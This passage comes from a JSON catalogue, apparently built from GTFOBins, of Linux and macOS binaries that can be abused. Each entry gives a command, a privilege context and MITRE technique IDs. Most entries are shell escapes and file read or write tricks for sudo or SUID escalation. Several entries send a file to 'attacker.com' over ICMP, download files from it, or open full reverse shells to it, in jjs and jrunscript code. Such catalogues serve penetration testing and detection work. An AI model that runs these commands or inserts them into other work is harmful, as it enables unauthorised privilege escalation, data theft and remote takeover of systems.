output is actually an hex dump.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hexdump/"]},{"id":"gtfo:hg:shell:0:sudo","toolId":"gtfo:hg","toolName":"hg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hg --config alias.x='!/bin/sh' x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hg/"]},{"id":"gtfo:hg:shell:0:suid","toolId":"gtfo:hg","toolName":"hg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hg --config alias.x='!/bin/sh' x","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/hg/"]},{"id":"gtfo:hg:shell:0:unprivileged","toolId":"gtfo:hg","toolName":"hg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"hg --config alias.x='!/bin/sh' x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hg/"]},{"id":"gtfo:highlight:file-read:0:sudo","toolId":"gtfo:highlight","toolName":"highlight","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"highlight --no-doc --failsafe /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/highlight/"]},{"id":"gtfo:highlight:file-read:0:suid","toolId":"gtfo:highlight","toolName":"highlight","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"highlight --no-doc --failsafe /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/highlight/"]},{"id":"gtfo:highlight:file-read:0:unprivileged","toolId":"gtfo:highlight","toolName":"highlight","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"highlight --no-doc --failsafe /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/highlight/"]},{"id":"gtfo:hping3:shell:0:sudo","toolId":"gtfo:hping3","toolName":"hping3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hping3\n/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hping3/"]},{"id":"gtfo:hping3:shell:0:suid","toolId":"gtfo:hping3","toolName":"hping3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"hping3\n/bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/hping3/"]},{"id":"gtfo:hping3:shell:0:unprivileged","toolId":"gtfo:hping3","toolName":"hping3","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"hping3\n/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hping3/"]},{"id":"gtfo:hping3:upload:0:sudo","toolId":"gtfo:hping3","toolName":"hping3","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"hping3 attacker.com --icmp --data 999 --sign xxx --file /path/to/input-file","description":"The file is continuously sent as ICMP packets (e.g., of `999` bytes), the optional `--end` parameter signals when the file reached the end.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hping3/"]},{"id":"gtfo:iconv:file-read:0:sudo","toolId":"gtfo:iconv","toolName":"iconv","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"iconv -f 8859_1 -t 8859_1 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iconv/"]},{"id":"gtfo:iconv:file-read:0:suid","toolId":"gtfo:iconv","toolName":"iconv","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"iconv -f 8859_1 -t 8859_1 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/iconv/"]},{"id":"gtfo:iconv:file-read:0:unprivileged","toolId":"gtfo:iconv","toolName":"iconv","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"iconv -f 8859_1 -t 8859_1 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/iconv/"]},{"id":"gtfo:iconv:file-write:0:sudo","toolId":"gtfo:iconv","toolName":"iconv","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | iconv -f 8859_1 -t 8859_1 -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iconv/"]},{"id":"gtfo:iconv:file-write:0:suid","toolId":"gtfo:iconv","toolName":"iconv","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | iconv -f 8859_1 -t 8859_1 -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/iconv/"]},{"id":"gtfo:iconv:file-write:0:unprivileged","toolId":"gtfo:iconv","toolName":"iconv","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | iconv -f 8859_1 -t 8859_1 -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/iconv/"]},{"id":"gtfo:iftop:shell:0:sudo","toolId":"gtfo:iftop","toolName":"iftop","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"iftop\n!/bin/sh","description":"This requires the privilege to capture on some device (specify with `-i` if needed).","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iftop/"]},{"id":"gtfo:iftop:shell:0:suid","toolId":"gtfo:iftop","toolName":"iftop","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"iftop\n!/bin/sh","description":"This requires the privilege to capture on some device (specify with `-i` if needed).","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/iftop/"]},{"id":"gtfo:iftop:shell:0:unprivileged","toolId":"gtfo:iftop","toolName":"iftop","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"iftop\n!/bin/sh","description":"This requires the privilege to capture on some device (specify with `-i` if needed).","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/iftop/"]},{"id":"gtfo:install:privilege-escalation:0:sudo","toolId":"gtfo:install","toolName":"install","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"install -m 6777 /path/to/input-file /path/to/output-dir/","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/install/"]},{"id":"gtfo:install:privilege-escalation:0:suid","toolId":"gtfo:install","toolName":"install","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"install -m 6777 /path/to/input-file /path/to/output-dir/","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/install/"]},{"id":"gtfo:ionice:shell:0:sudo","toolId":"gtfo:ionice","toolName":"ionice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ionice /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ionice/"]},{"id":"gtfo:ionice:shell:0:suid","toolId":"gtfo:ionice","toolName":"ionice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ionice /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ionice/"]},{"id":"gtfo:ionice:shell:0:unprivileged","toolId":"gtfo:ionice","toolName":"ionice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ionice /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ionice/"]},{"id":"gtfo:ip:file-read:0:sudo","toolId":"gtfo:ip","toolName":"ip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ip -force -batch /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ip/"]},{"id":"gtfo:ip:file-read:0:suid","toolId":"gtfo:ip","toolName":"ip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ip -force -batch /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ip/"]},{"id":"gtfo:ip:file-read:0:unprivileged","toolId":"gtfo:ip","toolName":"ip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ip -force -batch /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ip/"]},{"id":"gtfo:ip:shell:0:sudo","toolId":"gtfo:ip","toolName":"ip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ip netns add foo\nip netns exec foo /bin/sh\nip netns delete foo","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ip/"]},{"id":"gtfo:ip:shell:0:suid","toolId":"gtfo:ip","toolName":"ip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ip netns add foo\nip netns exec foo /bin/sh -p\nip netns delete foo","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ip/"]},{"id":"gtfo:ip:shell:1:sudo","toolId":"gtfo:ip","toolName":"ip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ip netns add foo\nip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar\nip netns exec bar /bin/sh\nip netns delete foo\nip netns delete bar","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ip/"]},{"id":"gtfo:iptables-save:file-write:0:sudo","toolId":"gtfo:iptables-save","toolName":"iptables-save","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"iptables -A INPUT -i lo -j ACCEPT -m comment --comment DATA\niptables -S\niptables-save -f /path/to/output-file","description":"The content is written along with a number of `iptables` rules.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iptables-save/"]},{"id":"gtfo:irb:inherit:0:sudo","toolId":"gtfo:irb","toolName":"irb","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"irb\n...","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/irb/"]},{"id":"gtfo:irb:inherit:0:unprivileged","toolId":"gtfo:irb","toolName":"irb","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"irb\n...","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/irb/"]},{"id":"gtfo:ispell:shell:0:sudo","toolId":"gtfo:ispell","toolName":"ispell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ispell /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ispell/"]},{"id":"gtfo:ispell:shell:0:suid","toolId":"gtfo:ispell","toolName":"ispell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ispell /etc/hosts\n!/bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ispell/"]},{"id":"gtfo:ispell:shell:0:unprivileged","toolId":"gtfo:ispell","toolName":"ispell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ispell /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ispell/"]},{"id":"gtfo:java:shell:0:sudo","toolId":"gtfo:java","toolName":"java","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"java Shell","description":"The `Shell.class` class file can be compiled offline, then uploaded to the target:\n\n```\ncat >Shell.java <<EOF\npublic class Shell {\n public static void main(String[] args) throws Exception {\n new ProcessBuilder(\"/bin/sh\").inheritIO().start().waitFor();\n }\n}\nEOF\n\njavac Shell.java\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/java/"]},{"id":"gtfo:java:shell:0:unprivileged","toolId":"gtfo:java","toolName":"java","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"java Shell","description":"The `Shell.class` class file can be compiled offline, then uploaded to the target:\n\n```\ncat >Shell.java <<EOF\npublic class Shell {\n public static void main(String[] args) throws Exception {\n new ProcessBuilder(\"/bin/sh\").inheritIO().start().waitFor();\n }\n}\nEOF\n\njavac Shell.java\n```","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/java/"]},{"id":"gtfo:jjs:download:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"jjs\nvar URL = Java.type('java.net.URL');\nvar ws = new URL('http://attacker.com/path/to/input-file');\nvar Channels = Java.type('java.nio.channels.Channels');\nvar rbc = Channels.newChannel(ws.openStream());\nvar FileOutputStream = Java.type('java.io.FileOutputStream');\nvar fos = new FileOutputStream('/path/to/output-file');\nfos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);\nfos.close();\nrbc.close();","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:download:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"jjs\nvar URL = Java.type('java.net.URL');\nvar ws = new URL('http://attacker.com/path/to/input-file');\nvar Channels = Java.type('java.nio.channels.Channels');\nvar rbc = Channels.newChannel(ws.openStream());\nvar FileOutputStream = Java.type('java.io.FileOutputStream');\nvar fos = new FileOutputStream('/path/to/output-file');\nfos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);\nfos.close();\nrbc.close();","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:file-read:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jjs\nvar BufferedReader = Java.type('java.io.BufferedReader');\nvar FileReader = Java.type('java.io.FileReader');\nvar br = new BufferedReader(new FileReader('/path/to/input-file'));\nwhile ((line = br.readLine()) != null) { print(line); }","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:file-read:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jjs\nvar BufferedReader = Java.type('java.io.BufferedReader');\nvar FileReader = Java.type('java.io.FileReader');\nvar br = new BufferedReader(new FileReader('/path/to/input-file'));\nwhile ((line = br.readLine()) != null) { print(line); }","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:file-write:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"jjs\nvar FileWriter = Java.type('java.io.FileWriter');\nvar fw=new FileWriter('/path/to/output-file');\nfw.write('DATA');\nfw.close();","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:file-write:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"jjs\nvar FileWriter = Java.type('java.io.FileWriter');\nvar fw=new FileWriter('/path/to/output-file');\nfw.write('DATA');\nfw.close();","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:reverse-shell:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"jjs\nvar host='attacker.com';\nvar port=12345;\nvar ProcessBuilder = Java.type('java.lang.ProcessBuilder');\nvar p=new ProcessBuilder('/bin/sh', '-i').redirectErrorStream(true).start();\nvar Socket = Java.type('java.net.Socket');\nvar s=new Socket(host,port);\nvar pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\nvar po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type('java.lang.Thread').sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:reverse-shell:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"jjs\nvar host='attacker.com';\nvar port=12345;\nvar ProcessBuilder = Java.type('java.lang.ProcessBuilder');\nvar p=new ProcessBuilder('/bin/sh', '-i').redirectErrorStream(true).start();\nvar Socket = Java.type('java.net.Socket');\nvar s=new Socket(host,port);\nvar pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\nvar po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type('java.lang.Thread').sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:shell:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jjs\nJava.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty').waitFor()","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:shell:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jjs\nJava.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty').waitFor()","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:joe:shell:0:sudo","toolId":"gtfo:joe","toolName":"joe","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"joe\n^K!/bin/sh","description":"The terminal is spawn int the terminal interface.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/joe/"]},{"id":"gtfo:joe:shell:0:suid","toolId":"gtfo:joe","toolName":"joe","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"joe\n^K!/bin/sh","description":"The terminal is spawn int the terminal interface.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/joe/"]},{"id":"gtfo:joe:shell:0:unprivileged","toolId":"gtfo:joe","toolName":"joe","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"joe\n^K!/bin/sh","description":"The terminal is spawn int the terminal interface.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/joe/"]},{"id":"gtfo:join:file-read:0:sudo","toolId":"gtfo:join","toolName":"join","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"join -a 2 /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/join/"]},{"id":"gtfo:join:file-read:0:suid","toolId":"gtfo:join","toolName":"join","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"join -a 2 /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/join/"]},{"id":"gtfo:join:file-read:0:unprivileged","toolId":"gtfo:join","toolName":"join","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"join -a 2 /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/join/"]},{"id":"gtfo:journalctl:inherit:0:sudo","toolId":"gtfo:journalctl","toolName":"journalctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"journalctl","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/journalctl/"]},{"id":"gtfo:journalctl:inherit:0:unprivileged","toolId":"gtfo:journalctl","toolName":"journalctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"journalctl","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/journalctl/"]},{"id":"gtfo:jq:file-read:0:sudo","toolId":"gtfo:jq","toolName":"jq","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jq -Rr . /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jq/"]},{"id":"gtfo:jq:file-read:0:suid","toolId":"gtfo:jq","toolName":"jq","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jq -Rr . /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/jq/"]},{"id":"gtfo:jq:file-read:0:unprivileged","toolId":"gtfo:jq","toolName":"jq","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jq -Rr . /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jq/"]},{"id":"gtfo:jrunscript:download:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"jrunscript -e 'cp(\"http://attacker.com/path/to/input-file\",\"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:download:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"jrunscript -e 'cp(\"http://attacker.com/path/to/input-file\",\"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:file-read:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jrunscript -e 'br = new BufferedReader(new java.io.FileReader(\"/path/to/input-file\"));\n while ((line = br.readLine()) != null) { print(line); }'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:file-read:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jrunscript -e 'br = new BufferedReader(new java.io.FileReader(\"/path/to/input-file\"));\n while ((line = br.readLine()) != null) { print(line); }'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:file-write:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"jrunscript -e 'var fw=new java.io.FileWriter(\"/path/to/output-file\");\n fw.write(\"DATA\");\n fw.close();'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:file-write:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"jrunscript -e 'var fw=new java.io.FileWriter(\"/path/to/output-file\");\n fw.write(\"DATA\");\n fw.close();'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:reverse-shell:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"jrunscript -e 'var host=\"attacker.com\";\n var port=12345;\n var p=new java.lang.ProcessBuilder(\"/bin/sh\", \"-i\").redirectErrorStream(true).start();\n var s=new java.net.Socket(host,port);\n var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\n var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){\n while(pi.available()>0)so.write(pi.read());\n while(pe.available()>0)so.write(pe.read());\n while(si.available()>0)po.write(si.read());\n so.flush();po.flush();\n java.lang.Thread.sleep(50);\n try {p.exitValue();break;}catch 